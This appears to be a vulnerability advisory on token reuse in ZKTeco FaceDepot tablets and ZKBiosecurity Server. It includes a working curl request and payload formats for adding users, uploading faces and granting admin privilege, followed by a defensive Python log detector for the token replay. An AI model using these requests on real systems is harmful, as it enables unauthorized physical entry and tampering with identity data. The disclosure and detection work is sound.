A token-reuse vulnerability in ZKTeco FaceDepot 7B 1.0.213 and ZKBiosecurity Server 1.0.0_20190723 allows an attacker to create arbitrary new users, elevate users to administrators, delete users, and download user faces from the database.
The vulnerability was submitted to ZDI on Dec 3, 2019.
ZDI received one response from the vendor, which acknowledged but did not confirm the vulnerability. The responsible-disclosure period expired on April 30, 2020.
ZKBiosecurity Server does not authenticate clients beyond a long-lived token (cf. CVE-2020-17473). One has to identify which FaceDepot tablet is allowed to register new users by sniffing the network for a period of time. After obtaining that tablet's token, one is able to
Add an arbitrary new user (who can then enter the office),
Upload a new face picture (letting an adversary physically enter the premises),
Delete an account (after a mission),
Escalate the privilege of the new user to admin (able to operate and configure the tablet directly).
Add a new user
curl -v -L -X POST -A 'iClock Proxy/1.09' 'http://192.168.0.1:8088/iclock/cdata?SN=LSR1915060003&table=tabledata&tablename=user&count=1' \
-b 'token=a72182ceb8e4695ea84300155953566d' -H 'Accept: application/push' -H 'Accept-Charset: UTF-8' -H 'Accept-Language: zh-CN' \
-H 'Content-Type: application/push;charset=UTF-8' -H 'Content-Language: zh-CN' --data-binary @bugoy.user.post
(The final data argument was mangled by e-mail obfuscation in the published copy; it is reconstructed here from the file name given below.)
Where the content of bugoy.user.post is (tab separated):
user uuid= cardno= pin=11111 password= group=1 starttime=0 endtime=0 name=Bugoy privilege=0 disable=0 verify=0
The content of totoro.post is a bit tricky, because the picture is in base64:
biophoto pin= filename=.jpg type= size= content=
After a new picture is uploaded, wait until the scheduled time at which all FaceDepot tablets synchronize, or until the admin taps "Update" on the screen.
Escalate the privilege to admin
Users with "privilege=14" have admin access to the FaceDepot tablet. With that privilege, one can configure the tablet directly: add users, set user privileges, delete users, browse the user database, install APKs via USB (the port is exposed at the bottom of the FaceDepot 7B), and switch to apps other than the ZKTeco launcher.
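Detection logic a defender could run over the server's request logs to spot the token reuse described above. This is an added example, not part of the original advisory; it assumes a simplified, constructed log format (source IP, method, URI, token cookie) and an inventory mapping each tablet SN to its known IP.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qs

# Constructed sample log lines (format is an assumption, not ZKBiosecurity's own).
# The token and SN are the values quoted on the page; the IPs are made up.
SAMPLE_LOG = """\
192.168.0.50 POST /iclock/cdata?SN=LSR1915060003&table=tabledata&tablename=user&count=1 token=a72182ceb8e4695ea84300155953566d
192.168.0.50 GET /iclock/getrequest?SN=LSR1915060003 token=a72182ceb8e4695ea84300155953566d
192.168.0.99 POST /iclock/cdata?SN=LSR1915060003&table=tabledata&tablename=user&count=1 token=a72182ceb8e4695ea84300155953566d
192.168.0.99 POST /iclock/cdata?SN=LSR1915060003&table=tabledata&tablename=biophoto&count=1 token=a72182ceb8e4695ea84300155953566d
"""

# Assumed inventory of enrolment tablets: serial number -> expected source IP.
KNOWN_TABLETS = {"LSR1915060003": "192.168.0.50"}
LINE_RE = re.compile(r"^(\S+) (\S+) (\S+) token=(\w+)$")

def parse_line(line):
    """Split one log line into its fields; returns None for unparsable lines."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    ip, method, uri, token = m.groups()
    parts = urlsplit(uri)
    q = parse_qs(parts.query)
    return {"ip": ip, "method": method, "path": parts.path, "token": token,
            "sn": q.get("SN", [None])[0], "table": q.get("table", [None])[0],
            "tablename": q.get("tablename", [None])[0]}

def detect_token_reuse(log_text, known_tablets=KNOWN_TABLETS):
    """Return alerts for (a) a tablet token presented from a second IP and
    (b) a user or biophoto push whose source IP is not the inventoried tablet."""
    alerts = []
    ips_per_token = defaultdict(set)
    for line in log_text.splitlines():
        rec = parse_line(line)
        if not rec:
            continue
        seen = ips_per_token[rec["token"]]
        if seen and rec["ip"] not in seen:          # same token, new client
            alerts.append(("token_reuse", rec["token"], rec["ip"]))
        seen.add(rec["ip"])
        is_push = (rec["method"] == "POST" and rec["path"] == "/iclock/cdata"
                   and rec["table"] == "tabledata"
                   and rec["tablename"] in ("user", "biophoto"))
        if is_push and known_tablets.get(rec["sn"]) != rec["ip"]:
            alerts.append(("unexpected_push", rec["tablename"], rec["ip"]))
    return alerts
```

A tablet that legitimately changes IP (DHCP) would trip the reuse check, so pair it with the inventory and treat the combination as the high-confidence signal.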